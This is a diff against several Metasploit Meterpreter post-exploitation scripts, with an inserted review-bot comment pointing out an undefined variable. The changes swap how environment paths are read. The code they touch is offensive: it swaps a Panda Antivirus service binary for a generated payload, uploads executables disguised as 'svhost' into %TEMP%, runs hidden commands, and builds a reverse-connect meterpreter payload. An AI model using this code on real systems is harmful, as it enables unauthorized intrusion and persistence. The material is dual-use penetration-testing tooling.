if os =~ /Windows 7|Vista|2008/
path4users = sysdrv + "\\users\\"
@ -166,7 +166,7 @@ def enum_users(os)
end
else
userinfo = {}
uservar = @client.fs.file.expand_path("%USERNAME%")
uservar = @client.sys.config.getenv('USERNAME')
userinfo['username'] = uservar
userinfo['userappdata'] = path4users + uservar + path2purple
users << userinfo


@ -301,7 +301,7 @@ def checkdep(session)
tmpout = ""
depmode = ""
# Expand environment %TEMP% variable
tmp = session.fs.file.expand_path("%TEMP%")
tmp = session.sys.config.getenv('TEMP')
# Create random name for the wmic output
wmicfile = sprintf("%.5d",rand(100000))
wmicout = "#{tmp}\\#{wmicfile}"


@ -30,7 +30,7 @@ end
record = ""
#Set path to the hosts file
hosts = session.fs.file.expand_path("%SYSTEMROOT%")+"\\System32\\drivers\\etc\\hosts"
hosts = session.sys.config.getenv('SYSTEMROOT')+"\\System32\\drivers\\etc\\hosts"
#Function check if UAC is enabled
def checkuac(session)
winver = session.sys.config.sysinfo


@ -69,16 +69,15 @@ elsif client.platform =~ /win32|win64/
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
# Change to our working directory.
workingdir = client.fs.file.expand_path("%ProgramFiles%")
client.fs.dir.chdir(workingdir + "\\Panda Software\\Panda Antivirus 2007\\")
workingdir = client.sys.config.getenv('ProgramFiles') + "\\Panda Software\\Panda Antivirus 2007\\"
client.fs.dir.chdir(workindir)
# Create a backup of the original exe.
print_status("Creating a copy of PAVSRV51 (PAVSRV51_back.EXE)...")
client.sys.process.execute("cmd.exe /c rename PAVSRV51.EXE PAVSRV51_back.EXE", nil, {'Hidden' => 'true'})
# Place our newly created exe with the orginal binary name.
tempdir = client.fs.file.expand_path("%ProgramFiles%")
tempexe = tempdir + "\\Panda Software\\Panda Antivirus 2007\\" + "PAVSRV51.EXE"
tempexe = workingdir + "PAVSRV51.EXE"
print_status("Sending EXE payload '#{tempexe}'.")
fd = client.fs.file.new(tempexe, "wb")
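Review bot: `client.fs.dir.chdir(workindir)` references an undefined local (the path was assigned to `workingdir` on the previous line), so the script raises NameError before anything runs; it should read `client.fs.dir.chdir(workingdir)`. The later `tempexe = workingdir + "PAVSRV51.EXE"` relies on `workingdir` keeping its trailing backslash, which the new assignment does provide. The enclosing `elsif client.platform =~ /win32|win64/` branch starts and ends outside the hunk.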


@ -106,7 +106,7 @@ def write_script_to_target(target_dir,vbs)
if target_dir
tempdir = target_dir
else
tempdir = @client.fs.file.expand_path("%TEMP%")
tempdir = @client.sys.config.getenv('TEMP')
end
tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
fd = @client.fs.file.new(tempvbs, "wb")


@ -70,7 +70,7 @@ if client.platform =~ /win32|win64/
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
# Place our newly created exe in %TEMP%
tempdir = client.fs.file.expand_path("%TEMP%")
tempdir = client.sys.config.getenv('TEMP')
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
print_status("Sending EXE payload '#{tempexe}'.")
fd = client.fs.file.new(tempexe, "wb")


@ -19,7 +19,7 @@ require 'digest/sha1'
"-l" => [ false, "Download Prefetch Folder Analysis Log"]
)
@tempdir = @session.fs.file.expand_path("%TEMP%")
@tempdir = @session.sys.config.getenv('TEMP')
#---------------------------------------------------------------------------------------------------------
def read_program_list


@ -57,7 +57,7 @@ def wmicexec(session,wmic,user,pass,trgt)
runfail = 0
runningas = session.sys.config.getuid
begin
tmp = session.fs.file.expand_path("%TEMP%")
tmp = session.sys.config.getenv('TEMP')
# Temporary file on windows host to store results
wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt"


@ -179,7 +179,7 @@ end
#---------------------------------------------------------------------------------------------------------
def upload(session,file)
location = session.fs.file.expand_path("%TEMP%")
location = session.sys.config.getenv('TEMP')
fileontrgt = "#{location}\\svhost#{rand(100)}.exe"
print_status("Uploading #{file}....")
session.fs.file.upload_file("#{fileontrgt}","#{file}")


@ -99,6 +99,10 @@ upload_fn = nil
end
}
envs = session.sys.config.getenvs('SystemRoot', 'TEMP')
sysdir = envs['SystemRoot']
tmpdir = envs['TEMP']
# Must have at least one of -c or -u
if not cmd and not upload_fn
print_status("Using default reverse-connect meterpreter payload; -c or -u not specified")
@ -110,9 +114,8 @@ if not cmd and not upload_fn
raw = pay.generate
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
#and placing it on the target in %TEMP%
tempdir = client.fs.file.expand_path("%TEMP%")
tempexename = Rex::Text.rand_text_alpha(rand(8)+6)
cmd = tempdir + "\\" + tempexename + ".exe"
cmd = tmpdir + "\\" + tempexename + ".exe"
print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{cmd}")
fd = client.fs.file.new(cmd, "wb")
fd.write(exe)
@ -139,8 +142,6 @@ end
#
# Upload the payload command if needed
#
sysdir = session.fs.file.expand_path("%SystemRoot%")
tmpdir = session.fs.file.expand_path("%TEMP%")
if upload_fn
begin
location = tmpdir.dup
